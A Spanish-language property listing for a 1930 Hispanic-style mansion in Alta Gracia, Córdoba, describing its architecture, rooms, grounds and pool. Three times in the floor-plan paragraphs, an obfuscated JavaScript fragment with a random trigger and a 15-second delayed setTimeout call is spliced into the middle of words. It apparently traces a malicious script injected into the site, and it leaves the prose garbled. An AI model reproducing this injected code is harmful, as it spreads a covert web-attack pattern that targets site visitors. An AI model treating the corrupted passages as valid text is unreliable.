Córdoba, Alta Gracia, Avenida Carlos Pellegrini, Importante Casona de estilo Hispano de 1930

Situada en una exclusiva zona residencial a mitad de camino entre el Sierras Hotel y El Golf Club A. Gracia posee 2920 metros cuadrados de terreno y 577 metros cuadrados cubiertos.

Consultar

Estilo: Responde a una clara inspiración “hispano meridional”
evidenciada en la utilización de tejas españolas; profusión de hierro forjado en rejería, balaustres de balcones, farolas, verjas y portales de accesos; mayólicas con motivos religiosos o representaciones esquemáticas de neta impronta árabe, etc. Sin embargo, el mentado estilo se ve morigerado por el uso de ciertos elementos que imponen una nota “ecléctica” como columnas clásicas en la arquería que sirve de portal de entrada al estudio-escritorio o en el empleo de cristales emplomados en puertas exteriores e interiores, a más del recurso de lajas trabajadas en senderos- y caminos del parque.

Descripción: Se trata de una construcción exenta y sobria resultado de la síntesis volumétrica reflejada en la disposición espacial del conjunto habiéndose utilizado materiales nobles y de calidad que definen el lenguaje expresivo de su arquitectura.
Los distintos ambientes presentan una fluida continuidad espacial y parecen desarrollarse en una sola planta desde la perspectiva norte-oeste, pero desde la perspectiva sur-este la unidad deviene en sendas plantas como consecuencia de un subsuelo desarrollándose según desniveles del terreno.

Planta principal

-Acceso principal con importante recepción que desemboca en un living comedor en el que destaca un imponente hogar y revestimiento de piso con un elaborado diseño en damero de parquet de palo de rosal de origen checoeslovaco, todo ello enmarcado por grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andes vigas de madera en cielorrasos. Este espacio se expandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande hacia el parque por medio de sendos balcones.
-Los ambientes antes relacionados dan origen a dos corredores abovedados a medio cañón, uno longitudinal y otro transversal, que enmarcan un estar-comedor amplio e iluminado por un gran ventanal con vista al parque.
-El corredor longitudinal conduce a un office (con alacenas y mesada con bacha de lavado de acero inoxidable) y cocina equipada con alacenas de madera y mesadas de mármol.
-El corredor transversal se halla separado del estar-comedor por un portal de vidriería y cuenta con un hogar de lajas trabajadas y labradas a manera de arco romano con muebles embutidos. Este conduce a tres dormitorios en suite equipados con placares y pisos de parquet de pino tea. El dormitorio principal se resuelve también con un estar íntimo-vestidor .

Planta baja

-El corredor longitudinal se continua a través de una escalera que lleva a la planta baja desarrollándose, interiormente, con baño de servicio, sala de máquinas (caldera de calefacción central a gas natural), lavadero calefaccionado, bodegas, ambiente para un play-room y finalmente el estudio escritorio. Este último, con piso de parquet y boisserie con marquetería de cedro concluye con una sala archivo anexa y salida independiente. La planta baja relacionada se expandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande hacia el exterior con una cochera con capacidad para dos automóviles, un garage y un depósito para herramientas de jardinería con placares de guardado.

Toda la construcción descripta se encuentra rodeada de una excelente parquización con añosos ejemplares (palos borrachos, cedros azules, algarrobos, gigantescas palmeras y coníferas, etc.) rematada con importante piscina (azulejada, con pisos antideslizantes, trampolín y perimetrada con vereda de lajas). Todo lo cual condice con la imponencia de la construcción.

Si no puede ver el mapa 3D. Hacer clic en el boton “Sat”. (o descargue el pluggin de google earth)

Ver Casona Av Pellegrini en un mapa ampliado

Share Button